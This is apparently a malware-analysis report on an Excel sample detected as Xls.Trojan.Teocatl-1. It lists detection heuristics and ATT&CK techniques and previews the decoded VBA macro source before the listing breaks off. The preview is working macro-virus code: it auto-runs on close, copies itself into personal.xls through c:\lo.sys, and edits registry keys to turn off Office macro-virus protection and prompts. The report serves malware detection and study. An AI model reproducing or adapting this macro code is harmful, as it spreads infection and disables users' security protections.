MALICIOUS
360
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
This Excel document contains malicious VBA macros, including Auto_Open and Auto_Close functions, which are designed to execute automatically. The critical heuristic firing for Shell() calls and the detection of VBA p-code auto-execution with execution tokens indicate that the macro attempts to run external commands. The script attempts to import a file named 'lo.sys' into the 'personal.xls' workbook, suggesting it's part of a multi-stage attack designed to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Xls.Trojan.Teocatl-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Teocatl-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 642371 bytes |
SHA-256: 1f7556f6c84217c64fccdee36b2d1206b74fc52dc2269f83d95e4ebf791cfc01 |
|||
|
Detection
ClamAV:
Xls.Trojan.Teocatl-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "syaDegnartS"
Sub Auto_Close()
On Error GoTo argh
Application.DisplayAlerts = False
Application.EnableCancelKey = xlDisabled
For i = 1 To Workbooks("personal.xls").VBProject.VBComponents.Count
If Workbooks("personal.xls").VBProject.VBComponents(i).Name = "StrangeDays" Then GoTo argh
Next i
With Workbooks("personal.xls").VBProject
With .VBComponents.Import("c:\lo.sys")
End With
End With
Workbooks("personal.xls").Save
argh:
End Sub
Attribute VB_Name = "StrangeDays"
Declare Function GetPrivateProfileStringA Lib "kernel32.dll" (ByVal lpSection As String, ByVal lpSetting As String, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long
Declare Function WritePrivateProfileStringA Lib "kernel32.dll" (ByVal lpSection As String, ByVal lpSetting As String, ByVal lpValue As String, ByVal lpFileName As String) As Long
Declare Function DeleteFileA Lib "kernel32.dll" (ByVal lpFileName As String) As Long
Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const REG_SZ As Long = 1
Global Const HKEY_CURRENT_USER As Long = &H80000001
Global Const HKEY_LOCAL_MACHINE As Long = &H80000002
Dim k As Long
Dim s As Long
Dim u As Long
Dim a As Long
Dim b As String
Sub AutoClose()
On Error GoTo bah
b = String(3, 0)
s = 256
v$ = String$(s, 0)
Application.DisplayAlerts = wdAlertsNone
Application.ScreenUpdating = False
Application.EnableCancelKey = wdCancelDisabled
ShowVisualBasicEditor = False
u = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Office\8.0\Word\Options", 0, KEY_ALL_ACCESS, k)
u = RegSetValueExA(k, "EnableMacroVirusProtection", 0, REG_SZ, "0", 1)
u = RegCloseKey(k)
u = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0, KEY_ALL_ACCESS, k)
u = RegSetValueExA(k, "Options6", 0, REG_DWORD, Chr$(0), 4)
u = RegCloseKey(k)
Open "c:\lo.sys" For Input As 1
Close 1
GoTo godisasucker
bah:
Application.VBE.ActiveVBProject.VBComponents("StrangeDays").Export "c:\lo.sys"
godisasucker:
On Error GoTo godsucks
If ActiveDocument = "" Then GoTo teonanacatl
'''[WORD BEGIN]''''''''''''''''''''''''''''''''''
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.ConfirmConversions = False
End With
ActiveDocument.ReadOnlyRecommended = False
'---------------------------
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.